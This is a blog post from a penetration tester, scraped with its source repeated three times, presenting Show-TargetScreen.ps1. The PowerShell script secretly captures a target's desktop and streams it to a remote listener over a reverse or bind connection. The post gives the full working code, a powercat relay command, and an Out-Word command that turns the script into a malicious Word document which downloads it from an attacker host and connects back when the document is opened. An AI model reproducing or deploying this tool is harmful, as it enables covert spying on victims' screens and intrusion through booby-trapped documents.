Stream a target’s Desktop using MJPEG and PowerShell

Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks to get it working but in the end, it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you Show-TargetScreen.ps1. This script can stream a target’s desktop in real time and the stream could be seen in browsers which support MJPEG (Firefox).

Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this:

function Show-TargetScreen<br>{<br>.SYNOPSIS<br>Nishang script which can be used for streaming a target's desktop using MJPEG.<br><br>.DESCRIPTION<br>This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening<br>on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.<br><br>A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) <br>should then be pointed to the local port to see the remote desktop.<br><br>The script should be used with Client Side Attacks. <br><br>.PARAMETER IPAddress<br>The IP address to connect to when using the -Reverse switch.<br><br>.PARAMETER Port<br>The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.<br><br>.EXAMPLE<br>PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443<br><br>Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on <br>the given IP and port. <br><br>.EXAMPLE<br>PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"<br><br>Above shows an example using the script in a client side attack. <br><br>.EXAMPLE<br>PS > Show-TargetScreen -Bind -Port 1234<br><br>Above shows an example of bind mode. Point Firefox to the IPAddress of the target and given port to see user's Desktop.<br><br><br>.LINK<br>http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html<br>https://github.com/samratashok/nishang<br>#>   <br><br>    [CmdletBinding(DefaultParameterSetName="reverse")] Param(<br><br>        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]<br>        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]<br>        [String]<br>        $IPAddress,<br><br>        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]<br>        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]<br>        [Int]<br>        $Port,<br><br>        [Parameter(ParameterSetName="reverse")]<br>        [Switch]<br>        $Reverse,<br><br>        [Parameter(ParameterSetName="bind")]<br>        [Switch]<br>        $Bind<br><br>    )<br><br>    while ($true)<br>    {<br>        try<br>        {<br>            Add-Type -AssemblyName System.Windows.Forms<br>            [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream<br><br>            #Connect back if the reverse switch is used.<br>            if ($Reverse)<br>            {<br>                $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)<br>                $socket.Connect($IPAddress,$Port)<br>                Write-Verbose "Connected to $IPAddress"<br>            }<br><br>            #Bind to the provided port if Bind switch is used.<br>            if ($Bind)<br>            {<br>                #Start a listener<br>                $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, $Port)<br>                $server = new-object System.Net.Sockets.TcpListener $endpoint<br>                $server.Start()<br>                $buffer = New-Object byte[] 1024<br>                $socket = $server.AcceptSocket()<br><br>            } <br><br><br>            #https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/<br>            function SendResponse($sock, $string)<br>            {<br>                if ($sock.Connected)<br>                {<br>                    $bytesSent = $sock.Send(<br>                    $string)<br>                    if ( $bytesSent -eq -1 )<br>                    {<br>                        Write-Output "Send failed to " + $sock.RemoteEndPoint<br>                    }<br>                }<br>            }<br><br>            function SendStrResponse($sock, $string)<br>            {<br>                if ($sock.Connected)<br>                {<br>                    $bytesSent = $sock.Send(<br>                    [text.Encoding]::Ascii.GetBytes($string))<br>                    if ( $bytesSent -eq -1 )<br>                    {<br>                        Write-Output ("Send failed to " + $sock.RemoteEndPoint)<br>                    }<br>                }<br>            }<br>            #Create the header for MJPEG stream<br>            function SendHeader(<br>                [net.sockets.socket] $sock,<br>                $length,<br>                $statusCode = "200 OK",<br>                $mimeHeader="text/html",<br>                $httpVersion="HTTP/1.1"<br>                )<br>            {<br>                $response = "HTTP/1.1 $statusCode`r`n" +<br>                "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n"<br>                SendStrResponse $sock $response<br>                Write-Verbose "Header sent to $IPAddress"<br>            }<br><br>            #Send the header<br>            SendHeader $socket<br><br>            while ($True)<br>            {<br><br>                $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)<br>                $g = [System.Drawing.Graphics]::FromImage($b)<br>                $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)<br>                $g.Dispose()<br>                $MemoryStream.SetLength(0)<br>                $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg))<br>                $b.Dispose()<br>                $length = $MemoryStream.Length<br>                [byte[]] $Bytes = $MemoryStream.ToArray()<br><br>                #Set the boundary for the multi-part request<br>                $str = "`n`n--boundary`n" +<br>                "Content-Type: image/jpeg`n" +<br>                "Content-Length: $length`n`n"<br><br>                #Send Requests<br>                SendStrResponse $socket $str<br>                SendResponse $socket $Bytes<br>            }<br>            $MemoryStream.Close()<br>        }<br>        catch<br>        {<br>            Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." <br>            Write-Error $_<br>        }<br>    }<br>}<br><br>

Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to Port 9000:

PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000

Note that if on a *nix machine, netcat could be used as well.

Now, to be able to stream a user’s Desktop, Show-TargetScreen must be used with a client side attack. Let’s use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -“Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443”, and use it as a payload for Out-Word.

PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"

Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example).

Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user’s Desktop.

Awesome! Isn’t it? I recently tried this in couple of pen tests and was quite satisfied with the results.

Couple of things which I would like to improve in future:
– Proxy support
– HTTPS Connection.

Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.

Post date December 17, 2015

Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this:

function Show-TargetScreen<br />{<br /><#<br />.SYNOPSIS<br />Nishang script which can be used for streaming a target's desktop using MJPEG.<br /><br />.DESCRIPTION<br />This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening<br />on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.<br /><br />A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) <br />should then be pointed to the local port to see the remote desktop.<br /><br />The script should be used with Client Side Attacks. <br /><br />.PARAMETER IPAddress<br />The IP address to connect to when using the -Reverse switch.<br /><br />.PARAMETER Port<br />The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.<br /><br />.EXAMPLE<br />PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443<br /><br />Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on <br />the given IP and port. <br /><br />.EXAMPLE<br />PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"<br /><br />Above shows an example using the script in a client side attack. <br /><br />.EXAMPLE<br />PS > Show-TargetScreen -Bind -Port 1234<br /><br />Above shows an example of bind mode. Point Firefox to the IPAddress of the target and given port to see user's Desktop.<br /><br /><br />.LINK<br />http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html<br />https://github.com/samratashok/nishang<br />#>   <br />    <br />    [CmdletBinding(DefaultParameterSetName="reverse")] Param(<br /><br />        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]<br />        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]<br />        [String]<br />        $IPAddress,<br /><br />        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]<br />        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]<br />        [Int]<br />        $Port,<br /><br />        [Parameter(ParameterSetName="reverse")]<br />        [Switch]<br />        $Reverse,<br /><br />        [Parameter(ParameterSetName="bind")]<br />        [Switch]<br />        $Bind<br /><br />    )<br />    <br />    while ($true)<br />    {<br />        try<br />        {<br />            Add-Type -AssemblyName System.Windows.Forms<br />            [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream<br /><br />            #Connect back if the reverse switch is used.<br />            if ($Reverse)<br />            {<br />                $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)<br />                $socket.Connect($IPAddress,$Port)<br />                Write-Verbose "Connected to $IPAddress"<br />            }<br /><br />            #Bind to the provided port if Bind switch is used.<br />            if ($Bind)<br />            {<br />                #Start a listener<br />                $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, $Port)<br />                $server = new-object System.Net.Sockets.TcpListener $endpoint<br />                $server.Start()<br />                $buffer = New-Object byte[] 1024<br />                $socket = $server.AcceptSocket()<br />        <br />            } <br />    <br />        <br />            #https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/<br />            function SendResponse($sock, $string)<br />            {<br />                if ($sock.Connected)<br />                {<br />                    $bytesSent = $sock.Send(<br />                    $string)<br />                    if ( $bytesSent -eq -1 )<br />                    {<br />                        Write-Output "Send failed to " + $sock.RemoteEndPoint<br />                    }<br />                }<br />            }<br /><br />            function SendStrResponse($sock, $string)<br />            {<br />                if ($sock.Connected)<br />                {<br />                    $bytesSent = $sock.Send(<br />                    [text.Encoding]::Ascii.GetBytes($string))<br />                    if ( $bytesSent -eq -1 )<br />                    {<br />                        Write-Output ("Send failed to " + $sock.RemoteEndPoint)<br />                    }<br />                }<br />            }<br />            #Create the header for MJPEG stream<br />            function SendHeader(<br />                [net.sockets.socket] $sock,<br />                $length,<br />                $statusCode = "200 OK",<br />                $mimeHeader="text/html",<br />                $httpVersion="HTTP/1.1"<br />                )<br />            {<br />                $response = "HTTP/1.1 $statusCode`r`n" +<br />                "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n"<br />                SendStrResponse $sock $response<br />                Write-Verbose "Header sent to $IPAddress"<br />            }<br /><br />            #Send the header<br />            SendHeader $socket<br /><br />            while ($True)<br />            {<br /><br />                $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)<br />                $g = [System.Drawing.Graphics]::FromImage($b)<br />                $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)<br />                $g.Dispose()<br />                $MemoryStream.SetLength(0)<br />                $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg))<br />                $b.Dispose()<br />                $length = $MemoryStream.Length<br />                [byte[]] $Bytes = $MemoryStream.ToArray()<br />        <br />                #Set the boundary for the multi-part request<br />                $str = "`n`n--boundary`n" +<br />                "Content-Type: image/jpeg`n" +<br />                "Content-Length: $length`n`n"<br />        <br />                #Send Requests<br />                SendStrResponse $socket $str<br />                SendResponse $socket $Bytes<br />            }<br />            $MemoryStream.Close()<br />        }<br />        catch<br />        {<br />            Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." <br />            Write-Error $_<br />        }<br />    }<br />}<br /><br />

PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000

Note that if on a *nix machine, netcat could be used as well.

PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"

Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user’s Desktop.

Awesome! Isn’t it? I recently tried this in couple of pen tests and was quite satisfied with the results.

Couple of things which I would like to improve in future:
– Proxy support
– HTTPS Connection.

Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.

Print Share Comment Cite Upload Translate

APA

() » Stream a target’s Desktop using MJPEG and PowerShell. Retrieved from https://www.truth.cx/2015/12/17/stream-a-targets-desktop-using-mjpeg-and-powershell/.

MLA

" » Stream a target’s Desktop using MJPEG and PowerShell." - , https://www.truth.cx/2015/12/17/stream-a-targets-desktop-using-mjpeg-and-powershell/

HARVARD

» Stream a target’s Desktop using MJPEG and PowerShell., viewed ,

VANCOUVER

- » Stream a target’s Desktop using MJPEG and PowerShell. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2015/12/17/stream-a-targets-desktop-using-mjpeg-and-powershell/

CHICAGO

" » Stream a target’s Desktop using MJPEG and PowerShell." - Accessed . https://www.truth.cx/2015/12/17/stream-a-targets-desktop-using-mjpeg-and-powershell/

IEEE

" » Stream a target’s Desktop using MJPEG and PowerShell." [Online]. Available: https://www.truth.cx/2015/12/17/stream-a-targets-desktop-using-mjpeg-and-powershell/. [Accessed: ]

Select a language:

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"></div>Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks to get it working but in the end, it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you Show-TargetScreen.ps1. This script can stream a target's desktop in real time and the stream could be seen in browsers which support MJPEG (Firefox). <a href="https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1">Show-TargetScreen is available in the Gather category of Nishang</a>. The current source code looks like this:</div><div style="text-align: justify;"> <pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: white; color: black;">function Show-TargetScreen { <# .SYNOPSIS Nishang script which can be used for streaming a target's desktop using MJPEG. .DESCRIPTION This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop. The script should be used with Client Side Attacks. .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443 Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" Above shows an example using the script in a client side attack. .EXAMPLE PS > Show-TargetScreen -Bind -Port 1234 Above shows an example of bind mode. Point Firefox to the IPAddress of the target and given port to see user's Desktop. .LINK http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) while ($true) { try { Add-Type -AssemblyName System.Windows.Forms [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream #Connect back if the reverse switch is used. if ($Reverse) { $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) $socket.Connect($IPAddress,$Port) Write-Verbose "Connected to $IPAddress" } #Bind to the provided port if Bind switch is used. if ($Bind) { #Start a listener $endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, $Port) $server = new-object System.Net.Sockets.TcpListener $endpoint $server.Start() $buffer = New-Object byte[] 1024 $socket = $server.AcceptSocket() } #https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/ function SendResponse($sock, $string) { if ($sock.Connected) { $bytesSent = $sock.Send( $string) if ( $bytesSent -eq -1 ) { Write-Output "Send failed to " + $sock.RemoteEndPoint } } } function SendStrResponse($sock, $string) { if ($sock.Connected) { $bytesSent = $sock.Send( [text.Encoding]::Ascii.GetBytes($string)) if ( $bytesSent -eq -1 ) { Write-Output ("Send failed to " + $sock.RemoteEndPoint) } } } #Create the header for MJPEG stream function SendHeader( [net.sockets.socket] $sock, $length, $statusCode = "200 OK", $mimeHeader="text/html", $httpVersion="HTTP/1.1" ) { $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" SendStrResponse $sock $response Write-Verbose "Header sent to $IPAddress" } #Send the header SendHeader $socket while ($True) { $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) $g = [System.Drawing.Graphics]::FromImage($b) $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) $g.Dispose() $MemoryStream.SetLength(0) $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) $b.Dispose() $length = $MemoryStream.Length [byte[]] $Bytes = $MemoryStream.ToArray() #Set the boundary for the multi-part request $str = "`n`n--boundary`n" + "Content-Type: image/jpeg`n" + "Content-Length: $length`n`n" #Send Requests SendStrResponse $socket $str SendResponse $socket $Bytes } $MemoryStream.Close() } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } } }

PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000

Note that if on a *nix machine, netcat could be used as well.

Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word.

PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"

Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop.

Awesome! Isn't it? I recently tried this in couple of pen tests and was quite satisfied with the results.

Couple of things which I would like to improve in future:
- Proxy support
- HTTPS Connection.

Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.

First name:

Last name:

Related Posts